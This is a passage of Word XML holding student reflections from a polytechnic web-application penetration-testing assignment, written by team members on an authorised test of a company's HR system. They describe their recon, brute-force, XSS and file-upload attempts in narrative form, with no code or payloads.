        <w:t>knowledge of this module as well as my own practical skills since actually performing penetration testing on a web application. It was definitely not an easy task in completing this assignment due to lack of experience and shortage of time, but thankfully, everyone managed to pull through and persevere all the stress and frustration during the testing phase. However, there were some vulnerabilities discovered by the automated scanners that I did not manage to exploit as I did not manage to fully grasp the concept and was not knowledgeable enough to performing testing even after some research as well as help by the team members.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DDC5F0" w14:textId="409D6CE1" w:rsidR="00471D00" w:rsidRPr="00981F14" w:rsidRDefault="00471D00" w:rsidP="00471D00">
      <w:r>
        <w:t xml:space="preserve">Overall, this assignment was definitely an interesting and valuable experience, personally for me, as it was very different compared to other module assignments where I managed to put my skills to the test and perform penetration testing on an actual web application. This involves using the knowledge I have </w:t>
      </w:r>
      <w:r w:rsidR="009725E6">
        <w:t>learned</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> from the curriculum, online documentations, and my experience from participating in Capture the Flag (CTF) competitions as it was definitely more fun discovering and exploiting different vulnerabilities compared to a web application hosted with intended exploits. In addition to improving my technical skills, I have also managed to overcome some challenges I initially had and improved on my soft skills since engaging with Mr</w:t>
      </w:r>
      <w:r w:rsidR="00651454">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Erwin. From that, I </w:t>
      </w:r>
      <w:r w:rsidR="009725E6">
        <w:t>learned</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to communicate in a professional manner and establish professional documentations which is a skill that cannot be easily taught in school. All in all, I am most thankful for this learning experience and opportunity as it has greatly impacted my personal growth</w:t>
      </w:r>
      <w:r w:rsidR="00C72A3A">
        <w:t xml:space="preserve"> and benefited me for my future endeavors</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3E12E8" w14:textId="35198F65" w:rsidR="00F62406" w:rsidRDefault="00F62406" w:rsidP="00F62406"/>
    <w:p w14:paraId="4C248B9B" w14:textId="77777777" w:rsidR="00BF7CDB" w:rsidRDefault="00BF7CDB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="183" w:name="_Toc93487320"/>
      <w:bookmarkStart w:id="184" w:name="_Toc93502899"/>
      <w:bookmarkStart w:id="185" w:name="_Toc93526935"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="263683CC" w14:textId="73DA0F98" w:rsidR="00861675" w:rsidRDefault="00861675" w:rsidP="00861675">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="186" w:name="_Toc94100266"/>
      <w:bookmarkStart w:id="187" w:name="_Toc93487321"/>
      <w:bookmarkStart w:id="188" w:name="_Toc93502900"/>
      <w:bookmarkStart w:id="189" w:name="_Toc93526936"/>
      <w:bookmarkEnd w:id="183"/>
      <w:bookmarkEnd w:id="184"/>
      <w:bookmarkEnd w:id="185"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Colin Foo Chi Yang</w:t>
      </w:r>
      <w:bookmarkEnd w:id="186"/>
    </w:p>
    <w:p w14:paraId="16FA0A72" w14:textId="77777777" w:rsidR="008269E4" w:rsidRDefault="008269E4" w:rsidP="008269E4">
      <w:r>
        <w:t>When the assignment brief was first presented during one of the lessons in the WAPT module, at the beginning I was quite reluctant to embark on this pen-testing project despite being a compulsory component. Given the imagined scale on an industrial level as well as I was under the impression that the web application, HRCMS by Tri-Niche was constructed by educated professionals after learning more about Erwin’s and some of the employee’s background as a Full-Stack Developer, there was an inner expectation to uncover an intricate vulnerability within the web application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116F8112" w14:textId="77777777" w:rsidR="008269E4" w:rsidRDefault="008269E4" w:rsidP="008269E4">
      <w:r>
        <w:t>Before reaching out to our assigned client, Erwin the representative from Tri-Niche, I was at first quite worried that our designated client, Erwin who could being strict towards not only to us in communication but also in the review of our constructed documents which are to be later signed before being allowed to conduct vulnerability scanning and exploitations. The reason for this was that upon reviewing the sample documents provided by my lecturer, Tan Hock Guan, the client by Bantu was extremely adamant on ensuring every detail and restraint was present in the Contract as well as the rather harsh comments written in the document by for that group to amend and edit accordingly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB75837" w14:textId="77777777" w:rsidR="008269E4" w:rsidRDefault="008269E4" w:rsidP="008269E4">
      <w:r>
        <w:t xml:space="preserve">After obtaining the to be engaged client’s working phone number and email address my team and I started discussing on the preferred platform of communication as well as the signing of documents such as the Scope, Rules of Engagement, Contract, Non-Disclosure, etc. The formal discussion of documents was not an issue as everything went ahead without a hitch following the team’s planned timeline. This came to my surprise given the minor ‘conflicts’ experienced between the previous group </w:t>
      </w:r>
      <w:r w:rsidRPr="00E13497">
        <w:t xml:space="preserve">and their client </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Bantu </w:t>
      </w:r>
      <w:r w:rsidRPr="00E13497">
        <w:t xml:space="preserve">as previous mentioned. This could be due to the multiple engagements Tri-Niche had with Ngee Ann Polytechnic for this assignment </w:t>
      </w:r>
      <w:r>
        <w:t>as</w:t>
      </w:r>
      <w:r w:rsidRPr="00E13497">
        <w:t xml:space="preserve"> compared to Bantu, hence, was a relief</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for myself in this regard</w:t>
      </w:r>
      <w:r w:rsidRPr="00E13497">
        <w:t xml:space="preserve">. During my communications with Erwin through the preferred platform, WhatsApp, </w:t>
      </w:r>
      <w:r>
        <w:t>it is known</w:t>
      </w:r>
      <w:r w:rsidRPr="00E13497">
        <w:t xml:space="preserve"> that Tri-Niche conducts their operation in Singapore and </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r w:rsidRPr="00E13497">
        <w:t>Indonesia</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E13497">
        <w:t xml:space="preserve"> I was not worried on any cultural disparity that might prohibit the progress of constructing the Pre-Testing documents or any language barrier </w:t>
      </w:r>
      <w:r>
        <w:t>despite</w:t>
      </w:r>
      <w:r w:rsidRPr="00E13497">
        <w:t xml:space="preserve"> his nationality as English as of current is the official business language</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> globally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC03D86" w14:textId="77777777" w:rsidR="008269E4" w:rsidRDefault="008269E4" w:rsidP="008269E4">
      <w:r>
        <w:t xml:space="preserve">Progressing pass getting the administrative documents in order, as I was aware of the nature of what a Grey-Box penetration Testing activity requires, I aided the team in obtaining as much information from communicating with the client of Tri-Niche about the HRCMS application. Amongst the enquiries prompted were sample user login credentials as well some background </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>on the development progress of the application as well as any past documented pen-testing event that were able to be provided to the team.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53052E25" w14:textId="77777777" w:rsidR="008269E4" w:rsidRDefault="008269E4" w:rsidP="008269E4">
      <w:r>
        <w:t xml:space="preserve">Once the team was given the official green light to begin, I was unsure of where to begin let alone on how to begin. Thanks to the assignment brief of the tutor’s report which was like Ngee Ann’s ‘Web Application Penetration Testing Methodology’ from the Testing Phase, I began on Passive and Active Reconnaissance as well as other information gathering tools to better understand the visual construct of the sitemap, its relevant components utilized. </w:t>
      </w:r>
      <w:r w:rsidRPr="00E13497">
        <w:t xml:space="preserve">During this phase, there were no hurdles except for a minor hiccup caused by LiteSpeed Firewall </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">detecting unwanted activities which </w:t>
      </w:r>
      <w:r w:rsidRPr="00E13497">
        <w:t>bloc</w:t>
      </w:r>
      <w:r>
        <w:t>ked</w:t>
      </w:r>
      <w:r w:rsidRPr="00E13497">
        <w:t xml:space="preserve"> my IP </w:t>
      </w:r>
      <w:r>
        <w:t>as a result,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E13497">
        <w:t xml:space="preserve"> prevent</w:t>
      </w:r>
      <w:r>
        <w:t>ing the use of some tools that did not utilize random agent in its standard commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C83403" w14:textId="7A8E1164" w:rsidR="008269E4" w:rsidRPr="00E13497" w:rsidRDefault="008269E4" w:rsidP="008269E4">
      <w:r w:rsidRPr="00E13497">
        <w:t>Subsequently, I proceeded to conduct manual and automated vulnerability scanning where I attempted to scour the web application as an employee user – the lower privileged role to identify possible indicators of privilege escalation</w:t>
      </w:r>
      <w:r>
        <w:t>. Despite my efforts</w:t>
      </w:r>
      <w:r w:rsidRPr="00E13497">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>I passed</w:t>
      </w:r>
      <w:r w:rsidRPr="00E13497">
        <w:t xml:space="preserve"> the search onto my teammate</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00E13497">
        <w:t>. Where I manage to find more success in was the authentication of the web application. Monopolizing the report by Nessus that the application utilizes form-based authentication which was identified by my teammate as ‘info’ severity, I was able to use the Burp tool to identify that the application transmits its credentials in plaintext, on top of that the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> application</w:t>
      </w:r>
      <w:r w:rsidRPr="00E13497">
        <w:t xml:space="preserve"> lack </w:t>
      </w:r>
      <w:r>
        <w:t>a logging system to time a user out after certain number of attempts.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E13497">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Hence, w</w:t>
      </w:r>
      <w:r w:rsidRPr="00E13497">
        <w:t>ith unlimited attempts</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E13497">
        <w:t xml:space="preserve"> regardless of user </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">will be able </w:t>
      </w:r>
      <w:r w:rsidRPr="00E13497">
        <w:t xml:space="preserve">to log into the application through brute forcing </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">exploits </w:t>
      </w:r>
      <w:r w:rsidRPr="00E13497">
        <w:t>which was successful</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in this case</w:t>
      </w:r>
      <w:r w:rsidRPr="00E13497">
        <w:t xml:space="preserve">. By that moment, the other members of the team had already exhausted </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the remaining </w:t>
      </w:r>
      <w:r w:rsidRPr="00E13497">
        <w:t xml:space="preserve">vulnerabilities found on the application which concludes the vulnerable searching section </w:t>
      </w:r>
      <w:r>
        <w:t>of the</w:t>
      </w:r>
      <w:r w:rsidRPr="00E13497">
        <w:t xml:space="preserve"> Testing Phase.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03800028" w14:textId="77777777" w:rsidR="008269E4" w:rsidRDefault="008269E4" w:rsidP="008269E4">
      <w:r>
        <w:t>Through the vulnerability previously mentioned I was able to conduct exploits of intercepting insecure transport of data as well as an automated brute forcing attack to break into application’s user authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6092A052" w14:textId="77777777" w:rsidR="008269E4" w:rsidRDefault="008269E4" w:rsidP="008269E4">
      <w:r>
        <w:t>Although by the end of the contract with the client, I would deem the pen-testing successful as vulnerabilities were managed to be identified and exploited including the previously mentioned privilege escalation which is the</w:t>
      </w:r>
      <w:r w:rsidRPr="00E13497">
        <w:t xml:space="preserve"> Broken Access Control related vulnerability. However, given that the application hosted for pen-testing</w:t>
      </w:r>
      <w:r>
        <w:t>, HRCMS</w:t>
      </w:r>
      <w:r w:rsidRPr="00E13497">
        <w:t xml:space="preserve"> was </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">an </w:t>
      </w:r>
      <w:r w:rsidRPr="00E13497">
        <w:t>abandoned</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> replica of the original project by Tri-Niche</w:t>
      </w:r>
      <w:r w:rsidRPr="00E13497">
        <w:t xml:space="preserve"> and thus not completed in its development of its main features</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as intended. Therefore,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E13497">
        <w:t xml:space="preserve"> the findings of the </w:t>
      </w:r>
      <w:r>
        <w:t>documented</w:t>
      </w:r>
      <w:r w:rsidRPr="00E13497">
        <w:t xml:space="preserve"> vulnerabilities</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and exploits</w:t>
      </w:r>
      <w:r w:rsidRPr="00E13497">
        <w:t xml:space="preserve"> were not as fulfilling as previously once thought. On top of that, many of the CVE’s findings found was described by the </w:t>
      </w:r>
      <w:r w:rsidRPr="00E13497">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Nessus and Wapiti as well as flaws of HSTS headers and jQuery vulnerability’s indicators were not found </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">to be exploitable </w:t>
      </w:r>
      <w:r w:rsidRPr="00E13497">
        <w:t>on the application. Because of that, I was not able to test for and execute any exploit on top of the firewall blocking malicious file upload as well as my lack of deep understanding on the reported vulnerabilit</w:t>
      </w:r>
      <w:r>
        <w:t>ies</w:t>
      </w:r>
      <w:r w:rsidRPr="00E13497">
        <w:t xml:space="preserve"> to implement the exploit under the context of the web application’s construct. Despite continued attempts, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">HRCMS has a high possibility of a secure framework implementation by Tri-Niche but with hidden flaws swept under the rug. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741D66EB" w14:textId="77777777" w:rsidR="008269E4" w:rsidRPr="00E13497" w:rsidRDefault="008269E4" w:rsidP="008269E4">
      <w:r w:rsidRPr="00E13497">
        <w:t xml:space="preserve">Looking back </w:t>
      </w:r>
      <w:r>
        <w:t>from the start of this</w:t>
      </w:r>
      <w:r w:rsidRPr="00E13497">
        <w:t xml:space="preserve"> assignment, I have understood the Penetration Testing Methodology used by Ngee Ann as well as it’s referenced OWASP version to derive a detailed analysis of a web application as well as understanding how to construct a detailed pen-testing on an industrial standard.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27022C40" w14:textId="77777777" w:rsidR="008269E4" w:rsidRPr="00E13497" w:rsidRDefault="008269E4" w:rsidP="008269E4">
      <w:r w:rsidRPr="00E13497">
        <w:t xml:space="preserve">Next, I have experienced </w:t>
      </w:r>
      <w:r>
        <w:t>to communicate</w:t>
      </w:r>
      <w:r w:rsidRPr="00E13497">
        <w:t xml:space="preserve"> with the client effectively in a </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">simple and </w:t>
      </w:r>
      <w:r w:rsidRPr="00E13497">
        <w:t xml:space="preserve">prepared manner to save time and miscommunications from occurring. An example of this was to prepare a rough visual timeline of </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the project’s </w:t>
      </w:r>
      <w:r w:rsidRPr="00E13497">
        <w:t xml:space="preserve">events </w:t>
      </w:r>
      <w:r>
        <w:t>as well as</w:t>
      </w:r>
      <w:r w:rsidRPr="00E13497">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">completed professional </w:t>
      </w:r>
      <w:r w:rsidRPr="00E13497">
        <w:t>official documents</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in straight forward English</w:t>
      </w:r>
      <w:r w:rsidRPr="00E13497">
        <w:t xml:space="preserve"> that are to be signed </w:t>
      </w:r>
      <w:r>
        <w:t>and can be easily</w:t>
      </w:r>
      <w:r w:rsidRPr="00E13497">
        <w:t xml:space="preserve"> understood by the client. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196855DD" w14:textId="77777777" w:rsidR="008269E4" w:rsidRDefault="008269E4" w:rsidP="008269E4">
      <w:r w:rsidRPr="00E13497">
        <w:t>Besides communication with the client</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E13497">
        <w:t xml:space="preserve"> there were lessons learnt from teammates as well. Regardless of environment that an individual is in, members of a project will</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> always</w:t>
      </w:r>
      <w:r w:rsidRPr="00E13497">
        <w:t xml:space="preserve"> have a varying degree of expertise and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with the capable ones</w:t>
      </w:r>
      <w:r w:rsidRPr="00E13497">
        <w:t xml:space="preserve"> continu</w:t>
      </w:r>
      <w:r>
        <w:t>ing to</w:t>
      </w:r>
      <w:r w:rsidRPr="00E13497">
        <w:t xml:space="preserve"> explore new gateway of possible vulnerabilities. With that in mind, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">instead of competing with one another, </w:t>
      </w:r>
      <w:r w:rsidRPr="00E13497">
        <w:t>harnessing teammate’s strength, and complementing on each other is important to ensure the best outcome as a team can be achieved regardless of the levels of success in terms of outcome</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> at the end</w:t>
      </w:r>
      <w:r w:rsidRPr="00E13497">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B2C51E" w14:textId="77777777" w:rsidR="008269E4" w:rsidRPr="00E13497" w:rsidRDefault="008269E4" w:rsidP="008269E4">
      <w:r>
        <w:t>On a side note, I have also discovered the importance of documenting my exploits, vulnerability identification attempts in the form of words, screenshot, and code regardless of if it being successful or not. Many times, I would jump back forth in different module’s assignment even between topics of research within the same assignment. As a result, I would often find myself in a dilemma of what I have done and failed to remember countless times of the correct steps that led up to where was left of previously. Documenting on the go places emphasis on effort but is outweigh by the consistency that can be brought in a project for efficient research continuation and convenience when consolidating for report deliverables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F40F4D4" w14:textId="77777777" w:rsidR="008269E4" w:rsidRPr="00E13497" w:rsidRDefault="008269E4" w:rsidP="008269E4">
      <w:r w:rsidRPr="00E13497">
        <w:t xml:space="preserve">Lastly, individually I have gained new technical skills not only in executing exploits but also my understanding of the framework and the structural implementation. That can be easily referenced to the CVE database where I would at point know enough about the framework to think I am right </w:t>
      </w:r>
      <w:r w:rsidRPr="00E13497">
        <w:lastRenderedPageBreak/>
        <w:t>in carrying out the steps for HSTS vulnerability detection and not enough about the topic to know wh</w:t>
      </w:r>
      <w:r>
        <w:t>at</w:t>
      </w:r>
      <w:r w:rsidRPr="00E13497">
        <w:t xml:space="preserve"> went wrong with its exploit implementation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FD3631" w14:textId="77777777" w:rsidR="008269E4" w:rsidRPr="00E13497" w:rsidRDefault="008269E4" w:rsidP="008269E4">
      <w:r>
        <w:t>In conclusion, from</w:t>
      </w:r>
      <w:r w:rsidRPr="00E13497">
        <w:t xml:space="preserve"> this assignment to conduct a pen-testing project, I have learnt the extent of my individual skill as a Cybersecurity student as well as </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">am able to put my skills and patience from previous Capture the Flag (CTF) events to the test which were held rather occasionally throughout the year. Nonetheless, I have </w:t>
      </w:r>
      <w:r w:rsidRPr="00E13497">
        <w:t xml:space="preserve">accumulated my learning experience overall in newly identified </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">pen-testing </w:t>
      </w:r>
      <w:r w:rsidRPr="00E13497">
        <w:t>approaches</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, mindset, </w:t>
      </w:r>
      <w:r w:rsidRPr="00E13497">
        <w:t>knowledge,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and communication skills</w:t>
      </w:r>
      <w:r w:rsidRPr="00E13497">
        <w:t xml:space="preserve"> when conducting </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">similar projects </w:t>
      </w:r>
      <w:r w:rsidRPr="00E13497">
        <w:t>of similar scale. Given the opportunity to embark on another pen-testing project I would take it up to implement what I have learnt here and accumulate more along the way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA0B184" w14:textId="77777777" w:rsidR="00861675" w:rsidRDefault="00861675" w:rsidP="00861675">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFA3799" w14:textId="310CA19C" w:rsidR="00B970DD" w:rsidRDefault="00990674" w:rsidP="00990674">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="190" w:name="_Toc94100267"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Tan Yi Qian</w:t>
      </w:r>
      <w:bookmarkEnd w:id="187"/>
      <w:bookmarkEnd w:id="188"/>
      <w:bookmarkEnd w:id="189"/>
      <w:bookmarkEnd w:id="190"/>
    </w:p>
    <w:p w14:paraId="5D5CF6B4" w14:textId="00FBCF5E" w:rsidR="00BB32D2" w:rsidRPr="00C550AA" w:rsidRDefault="00BB32D2" w:rsidP="00BB32D2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C550AA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">When the assignment was first shown to the class, I was worried as this was a real-life web application which I would need to pen-test. Viewing the different web applications available for the team to pen-test, the team chose Tri-Niche, the website for educational learning objects. Upon viewing the web application, it was directed to a login page. Without being able to fully see the different functions of the web application, I did not know what to expect when pen-testing this web application. </w:t>
      </w:r>
      <w:r w:rsidR="00D83731" w:rsidRPr="00C550AA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Also,</w:t>
      </w:r>
      <w:r w:rsidRPr="00C550AA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> this will be the first time I will be working with another party outside of Ngee Ann Polytechnic, I was anxious as I was representing the school.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52714BB7" w14:textId="0E7A5E11" w:rsidR="00BB32D2" w:rsidRPr="00C550AA" w:rsidRDefault="00BB32D2" w:rsidP="00BB32D2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C550AA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Doing my own due diligence, I </w:t>
      </w:r>
      <w:r w:rsidR="00D83731" w:rsidRPr="00C550AA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>realized</w:t>
      </w:r>
      <w:r w:rsidRPr="00C550AA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> that the client, Mr. Erwin Tris Sanjaya was a Full Stack Developer at Tri-Niche Pte Ltd based in Indonesia. Thinking about the communication barrier which my team and I might face and the profession of the client, I was even more worried that I was unable to meet the expectations of the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F72986D" w14:textId="63064D33" w:rsidR="00BB32D2" w:rsidRPr="00C550AA" w:rsidRDefault="00BB32D2" w:rsidP="00BB32D2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C550AA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Without overthinking the assignment, my team and I decided to start early and contact the client to introduce ourselves, enquire queries which we had before constructing the Scope and Rules of Engagement documents and informing the client of the plans the team had with the assignment. Mr. Erwin was quick to respond to the email sent and responded casually which made me slightly relieve</w:t>
      </w:r>
      <w:r w:rsidR="002B7EF3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidRPr="00C550AA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> as communication with him </w:t>
      </w:r>
      <w:r w:rsidR="002B7EF3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>was not as intimidating as I initially thought it would</w:t>
      </w:r>
      <w:r w:rsidRPr="00C550AA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4E6B7C" w14:textId="77777777" w:rsidR="00BB32D2" w:rsidRPr="00C550AA" w:rsidRDefault="00BB32D2" w:rsidP="00BB32D2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C550AA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>The team and I immediately proceeded to construct all the documents required before pen-testing the web application, Scope, Rules of Engagement, Agreement Contract and Non-Disclosure Agreement. After completing all the documents which were approved and signed by both the lecturer and client, Mr. Tan and Mr. Erwin, I felt more confident to proceed with pen-testing the web application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7E3E60" w14:textId="77777777" w:rsidR="00BB32D2" w:rsidRPr="00C550AA" w:rsidRDefault="00BB32D2" w:rsidP="00BB32D2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C550AA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>During the duration when the documents were being constructed, approved, and signed, I went forward to perform passive reconnaissance, gathering as much publicly available information as possible on the web application. This phrase of the assignment was relatively achievable using the materials taught in lectures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2BC9E9" w14:textId="77777777" w:rsidR="00BB32D2" w:rsidRPr="00C550AA" w:rsidRDefault="00BB32D2" w:rsidP="00BB32D2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C550AA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Once all the documents which were required before pen-testing were approved and signed, I moved on to perform active reconnaissance. The output from the tools used provided useful information about the web application, however, based on the information gathered, I was unsure if the web application had any vulnerability due to the Web Application Firewall blocking my IP </w:t>
      </w:r>
      <w:r w:rsidRPr="00C550AA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>address and doing a reCAPTCHA to unblock it. It was frustrating having to unblock using the reCAPTCHA every time my IP address was blocked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEDABBD" w14:textId="77777777" w:rsidR="00BB32D2" w:rsidRPr="00C550AA" w:rsidRDefault="00BB32D2" w:rsidP="00BB32D2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C550AA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Since the scans performed by each of the team members did not provide solid proof that the vulnerabilities exist since there were false positives from the results. Manual testing was conducted to look more in-depth into the web application to confirm that the vulnerability shown by the scans were real or to find any vulnerabilities not shown from the results of the scans.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E23F0F" w14:textId="77777777" w:rsidR="00BB32D2" w:rsidRPr="00C550AA" w:rsidRDefault="00BB32D2" w:rsidP="00BB32D2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C550AA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Performing manual testing was a tedious phrase of the web application as I had to look carefully through the different pages within the web application and ensuring I did not miss out any minor information which could proof a vulnerability exists. Using information from the scans, I noticed that there was an interesting link hrcms-admin.tri-niche.com/files and upon looking up the link, it showed files stored from the web application such as image files of the employee’s profile picture. This discovery made me hopeful that there are other vulnerabilities which exists within the web application. I persevered and continue to look through each page when I chanced upon the second vulnerability which was and error information which provided details of the database that can be exploited. I was glad that I did not give up and managed to find two vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9A14A4" w14:textId="5B131FD2" w:rsidR="00BB32D2" w:rsidRPr="00C550AA" w:rsidRDefault="00BB32D2" w:rsidP="00BB32D2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C550AA">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Once the vulnerabilities were found, the team and I had to exploit them. I was worried as by exploiting the vulnerabilities, there was a chance that I may accidently bring down the web application as one of the exploits I was tasked to perform was Cross-Site Scripting (XSS) to deface the web application. With reassurance from my team which helped me through the exploit, I was grateful for their support and managed to successfully deface the web application without causing any disruptions to the web application. The second exploit was unrestricted file upload, where I had to upload a malicious web shell. The web application did not allow the script to be uploaded, after different attempts to upload the script, all efforts were in vain as it was blocked by the web application.</w:t>
      </w:r>
